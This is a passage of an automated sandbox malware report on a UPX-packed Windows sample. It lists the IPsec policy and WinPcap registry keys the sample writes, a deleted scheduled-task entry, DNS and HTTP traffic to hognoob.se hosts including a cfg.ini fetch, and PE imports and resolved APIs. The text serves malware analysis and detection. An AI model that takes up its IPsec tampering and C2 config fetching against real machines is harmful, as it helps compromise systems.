522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\name",
523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecName",
524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecID",
525. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecDataType",
526. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecData",
527. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecISAKMPReference",
528. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\whenChanged",
529. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference",
530. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}",
531. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\className",
532. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\name",
533. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecID",
534. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecDataType",
535. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecData",
536. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecNegotiationPolicyReference",
537. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\whenChanged",
538. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecNFAReference",
539. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecOwnersReference",
540. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecOwnersReference",
541. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}",
542. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\className",
543. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\name",
544. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecName",
545. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecID",
546. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyAction",
547. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyType",
548. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecDataType",
549. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecData",
550. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\whenChanged",
551. "HKEY_LOCAL_MACHINE\\Software\\WinPcap",
552. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\WinPcap\\(Default)",
553. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst",
554. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\UninstallString",
555. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\QuietUninstallString",
556. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayIcon",
557. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayName",
558. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayVersion",
559. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\Publisher",
560. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLInfoAbout",
561. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLUpdateInfo",
562. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMajor",
563. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMinor",
564. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\InstalledBy",
565. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoModify",
566. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoRepair",
567. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}",
568. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\className",
569. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\name",
570. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecName",
571. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecID",
572. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecDataType",
573. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecData",
574. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\whenChanged",
575. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}",
576. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\className",
577. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\name",
578. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecName",
579. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecID",
580. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecDataType",
581. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecData",
582. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecNegotiationPolicyReference",
583. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecFilterReference",
584. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\whenChanged",
585. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecOwnersReference",
586. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecOwnersReference",
587. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecOwnersReference",
588. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
589. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\IPSec",
590. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode",
591. "HKEY_CURRENT_USER\\Software\\Sysinternals\\ProcDump",
592. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Sysinternals\\ProcDump\\EulaAccepted"
593. ]
594.  
595. [*] Deleted Registry Keys: [
596. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\description",
597. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\description",
598. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\description",
599. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\description",
600. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job",
601. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job.fp",
602. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\description",
603. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference"
604. ]
605.  
606. [*] DNS Communications: [
607. {
608. "type": "A",
609. "request": "uio.hognoob.se",
610. "answers": [
611. {
612. "data": "185.164.72.143",
613. "type": "A"
614. }
615. ]
616. },
617. {
618. "type": "A",
619. "request": "upa1.hognoob.se",
620. "answers": [
621. {
622. "data": "172.105.237.113",
623. "type": "A"
624. }
625. ]
626. },
627. {
628. "type": "A",
629. "request": "upa2.hognoob.se",
630. "answers": [
631. {
632. "data": "139.162.13.92",
633. "type": "A"
634. }
635. ]
636. },
637. {
638. "type": "A",
639. "request": "2019.ip138.com",
640. "answers": [
641. {
642. "data": "183.250.88.67",
643. "type": "A"
644. },
645. {
646. "data": "3.ip138.com",
647. "type": "CNAME"
648. }
649. ]
650. },
651. {
652. "type": "A",
653. "request": "pxi.hognoob.se",
654. "answers": [
655. {
656. "data": "80.82.70.188",
657. "type": "A"
658. }
659. ]
660. },
661. {
662. "type": "A",
663. "request": "ifconfig.me",
664. "answers": [
665. {
666. "data": "216.239.34.21",
667. "type": "A"
668. },
669. {
670. "data": "216.239.36.21",
671. "type": "A"
672. },
673. {
674. "data": "216.239.38.21",
675. "type": "A"
676. },
677. {
678. "data": "216.239.32.21",
679. "type": "A"
680. }
681. ]
682. },
683. {
684. "type": "A",
685. "request": "isrg.trustid.ocsp.identrust.com",
686. "answers": [
687. {
688. "data": "isrg.trustid.ocsp.identrust.com.edgesuite.net",
689. "type": "CNAME"
690. },
691. {
692. "data": "a279.dscq.akamai.net",
693. "type": "CNAME"
694. },
695. {
696. "data": "2.21.71.25",
697. "type": "A"
698. },
699. {
700. "data": "2.21.71.34",
701. "type": "A"
702. }
703. ]
704. },
705. {
706. "type": "A",
707. "request": "crl.identrust.com",
708. "answers": [
709. {
710. "data": "192.35.177.64",
711. "type": "A"
712. },
713. {
714. "data": "apps.digsigtrust.com",
715. "type": "CNAME"
716. }
717. ]
718. }
719. ]
720.  
721. [*] Domains: [
722. {
723. "ip": "139.162.13.92",
724. "domain": "upa2.hognoob.se"
725. },
726. {
727. "ip": "2.21.71.25",
728. "domain": "isrg.trustid.ocsp.identrust.com"
729. },
730. {
731. "ip": "",
732. "domain": "2019.ip138.com"
733. },
734. {
735. "ip": "216.239.34.21",
736. "domain": "ifconfig.me"
737. },
738. {
739. "ip": "185.164.72.143",
740. "domain": "uio.hognoob.se"
741. },
742. {
743. "ip": "172.105.237.113",
744. "domain": "upa1.hognoob.se"
745. },
746. {
747. "ip": "192.35.177.64",
748. "domain": "crl.identrust.com"
749. },
750. {
751. "ip": "80.82.70.188",
752. "domain": "pxi.hognoob.se"
753. }
754. ]
755.  
756. [*] Network Communication - ICMP: []
757.  
758. [*] Network Communication - HTTP: [
759. {
760. "count": 2,
761. "body": "",
762. "uri": "http://uio.hognoob.se:63145/cfg.ini",
763. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
764. "method": "GET",
765. "host": "uio.hognoob.se:63145",
766. "version": "1.1",
767. "path": "/cfg.ini",
768. "data": "GET /cfg.ini HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nAccept: */*\r\nHost: uio.hognoob.se:63145\r\nCache-Control: no-cache\r\n\r\n",
769. "port": 63145
770. },
771. {
772. "count": 1,
773. "body": "",
774. "uri": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
775. "user-agent": "Microsoft-CryptoAPI/6.1",
776. "method": "GET",
777. "host": "isrg.trustid.ocsp.identrust.com",
778. "version": "1.1",
779. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
780. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: isrg.trustid.ocsp.identrust.com\r\n\r\n",
781. "port": 80
782. },
783. {
784. "count": 1,
785. "body": "",
786. "uri": "http://crl.identrust.com/DSTROOTCAX3CRL.crl",
787. "user-agent": "Microsoft-CryptoAPI/6.1",
788. "method": "GET",
789. "host": "crl.identrust.com",
790. "version": "1.1",
791. "path": "/DSTROOTCAX3CRL.crl",
792. "data": "GET /DSTROOTCAX3CRL.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.identrust.com\r\n\r\n",
793. "port": 80
794. }
795. ]
796.  
797. [*] Network Communication - SMTP: []
798.  
799. [*] Network Communication - Hosts: []
800.  
801. [*] Network Communication - IRC: []
802.  
803. [*] Static Analysis: {
804. "pe": {
805. "peid_signatures": null,
806. "imports": [
807. {
808. "imports": [
809. {
810. "name": "RegCloseKey",
811. "address": "0xa9e154"
812. }
813. ],
814. "dll": "ADVAPI32.dll"
815. },
816. {
817. "imports": [
818. {
819. "name": null,
820. "address": "0xa9e15c"
821. }
822. ],
823. "dll": "COMCTL32.dll"
824. },
825. {
826. "imports": [
827. {
828. "name": "ChooseColorA",
829. "address": "0xa9e164"
830. }
831. ],
832. "dll": "comdlg32.dll"
833. },
834. {
835. "imports": [
836. {
837. "name": "Escape",
838. "address": "0xa9e16c"
839. }
840. ],
841. "dll": "GDI32.dll"
842. },
843. {
844. "imports": [
845. {
846. "name": "GetAdaptersInfo",
847. "address": "0xa9e174"
848. }
849. ],
850. "dll": "iphlpapi.dll"
851. },
852. {
853. "imports": [
854. {
855. "name": "LoadLibraryA",
856. "address": "0xa9e17c"
857. },
858. {
859. "name": "ExitProcess",
860. "address": "0xa9e180"
861. },
862. {
863. "name": "GetProcAddress",
864. "address": "0xa9e184"
865. },
866. {
867. "name": "VirtualProtect",
868. "address": "0xa9e188"
869. }
870. ],
871. "dll": "KERNEL32.DLL"
872. },
873. {
874. "imports": [
875. {
876. "name": "OleRun",
877. "address": "0xa9e190"
878. }
879. ],
880. "dll": "ole32.dll"
881. },
882. {
883. "imports": [
884. {
885. "name": "VariantCopy",
886. "address": "0xa9e198"
887. }
888. ],
889. "dll": "OLEAUT32.dll"
890. },
891. {
892. "imports": [
893. {
894. "name": "RasHangUpA",
895. "address": "0xa9e1a0"
896. }
897. ],
898. "dll": "RASAPI32.dll"
899. },
900. {
901. "imports": [
902. {
903. "name": "ShellExecuteA",
904. "address": "0xa9e1a8"
905. }
906. ],
907. "dll": "SHELL32.dll"
908. },
909. {
910. "imports": [
911. {
912. "name": "GetDC",
913. "address": "0xa9e1b0"
914. }
915. ],
916. "dll": "USER32.dll"
917. },
918. {
919. "imports": [
920. {
921. "name": "VerQueryValueA",
922. "address": "0xa9e1b8"
923. }
924. ],
925. "dll": "VERSION.dll"
926. },
927. {
928. "imports": [
929. {
930. "name": "InternetOpenA",
931. "address": "0xa9e1c0"
932. }
933. ],
934. "dll": "WININET.dll"
935. },
936. {
937. "imports": [
938. {
939. "name": "waveOutOpen",
940. "address": "0xa9e1c8"
941. }
942. ],
943. "dll": "WINMM.dll"
944. },
945. {
946. "imports": [
947. {
948. "name": "OpenPrinterA",
949. "address": "0xa9e1d0"
950. }
951. ],
952. "dll": "WINSPOOL.DRV"
953. },
954. {
955. "imports": [
956. {
957. "name": "recvfrom",
958. "address": "0xa9e1d8"
959. }
960. ],
961. "dll": "WS2_32.dll"
962. }
963. ],
964. "digital_signers": null,
965. "exported_dll_name": null,
966. "actual_checksum": "0x00539452",
967. "overlay": null,
968. "imagebase": "0x00400000",
969. "reported_checksum": "0x00000000",
970. "icon_hash": null,
971. "entrypoint": "0x00a9d5b0",
972. "timestamp": "2019-06-24 19:13:25",
973. "osversion": "4.0",
974. "sections": [
975. {
976. "name": "UPX0",
977. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
978. "virtual_address": "0x00001000",
979. "size_of_data": "0x00000000",
980. "entropy": "0.00",
981. "raw_address": "0x00000400",
982. "virtual_size": "0x00170000",
983. "characteristics_raw": "0xe0000080"
984. },
985. {
986. "name": "UPX1",
987. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
988. "virtual_address": "0x00171000",
989. "size_of_data": "0x0052c800",
990. "entropy": "7.82",
991. "raw_address": "0x00000400",
992. "virtual_size": "0x0052d000",
993. "characteristics_raw": "0xe0000040"
994. },
995. {
996. "name": "UPX2",
997. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
998. "virtual_address": "0x0069e000",
999. "size_of_data": "0x00000400",
1000. "entropy": "3.70",
1001. "raw_address": "0x0052cc00",
1002. "virtual_size": "0x00001000",
1003. "characteristics_raw": "0xc0000040"
1004. }
1005. ],
1006. "resources": [],
1007. "dirents": [
1008. {
1009. "virtual_address": "0x00000000",
1010. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
1011. "size": "0x00000000"
1012. },
1013. {
1014. "virtual_address": "0x0069e000",
1015. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
1016. "size": "0x0000037c"
1017. },
1018. {
1019. "virtual_address": "0x00000000",
1020. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
1021. "size": "0x00000000"
1022. },
1023. {
1024. "virtual_address": "0x00000000",
1025. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
1026. "size": "0x00000000"
1027. },
1028. {
1029. "virtual_address": "0x00000000",
1030. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
1031. "size": "0x00000000"
1032. },
1033. {
1034. "virtual_address": "0x00000000",
1035. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
1036. "size": "0x00000000"
1037. },
1038. {
1039. "virtual_address": "0x00000000",
1040. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
1041. "size": "0x00000000"
1042. },
1043. {
1044. "virtual_address": "0x00000000",
1045. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
1046. "size": "0x00000000"
1047. },
1048. {
1049. "virtual_address": "0x00000000",
1050. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
1051. "size": "0x00000000"
1052. },
1053. {
1054. "virtual_address": "0x00000000",
1055. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
1056. "size": "0x00000000"
1057. },
1058. {
1059. "virtual_address": "0x00000000",
1060. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
1061. "size": "0x00000000"
1062. },
1063. {
1064. "virtual_address": "0x00000000",
1065. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
1066. "size": "0x00000000"
1067. },
1068. {
1069. "virtual_address": "0x00000000",
1070. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
1071. "size": "0x00000000"
1072. },
1073. {
1074. "virtual_address": "0x00000000",
1075. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
1076. "size": "0x00000000"
1077. },
1078. {
1079. "virtual_address": "0x00000000",
1080. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
1081. "size": "0x00000000"
1082. },
1083. {
1084. "virtual_address": "0x00000000",
1085. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
1086. "size": "0x00000000"
1087. }
1088. ],
1089. "exports": [],
1090. "guest_signers": {},
1091. "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
1092. "icon_fuzzy": null,
1093. "icon": null,
1094. "pdbpath": null,
1095. "imported_dll_count": 16,
1096. "versioninfo": []
1097. }
1098. }
1099.  
1100. [*] Resolved APIs: [
1101. "kernel32.dll.FileTimeToSystemTime",
1102. "kernel32.dll.GetTimeZoneInformation",
1103. "kernel32.dll.SetLastError",
1104. "kernel32.dll.GetSystemDirectoryA",
1105. "kernel32.dll.GetWindowsDirectoryA",
1106. "kernel32.dll.GetCurrentProcess",
1107. "kernel32.dll.MultiByteToWideChar",
1108. "kernel32.dll.WideCharToMultiByte",
1109. "kernel32.dll.Process32Next",
1110. "kernel32.dll.Process32First",
1111. "kernel32.dll.CreateToolhelp32Snapshot",
1112. "kernel32.dll.SetFilePointer",
1113. "kernel32.dll.GetFileSize",
1114. "kernel32.dll.TerminateProcess",
1115. "kernel32.dll.OpenProcess",
1116. "kernel32.dll.GetVersion",
1117. "kernel32.dll.TerminateThread",
1118. "kernel32.dll.CreateSemaphoreA",
1119. "kernel32.dll.ResumeThread",
1120. "kernel32.dll.ReleaseSemaphore",
1121. "kernel32.dll.EnterCriticalSection",
1122. "kernel32.dll.LeaveCriticalSection",
1123. "kernel32.dll.GetProfileStringA",
1124. "kernel32.dll.WriteFile",
1125. "kernel32.dll.InterlockedExchange",
1126. "kernel32.dll.IsBadCodePtr",
1127. "kernel32.dll.CompareStringW",
1128. "kernel32.dll.CompareStringA",
1129. "kernel32.dll.GetStringTypeW",
1130. "kernel32.dll.GetStringTypeA",
1131. "kernel32.dll.SetUnhandledExceptionFilter",
1132. "kernel32.dll.IsBadWritePtr",
1133. "kernel32.dll.VirtualAlloc",
1134. "kernel32.dll.LCMapStringW",
1135. "kernel32.dll.LCMapStringA",
1136. "kernel32.dll.SetEnvironmentVariableA",
1137. "kernel32.dll.VirtualFree",
1138. "kernel32.dll.HeapCreate",
1139. "kernel32.dll.HeapDestroy",
1140. "kernel32.dll.GetEnvironmentVariableA",
1141. "kernel32.dll.GetStdHandle",
1142. "kernel32.dll.SetHandleCount",
1143. "kernel32.dll.GetEnvironmentStringsW",
1144. "kernel32.dll.GetEnvironmentStrings",
1145. "kernel32.dll.FreeEnvironmentStringsW",
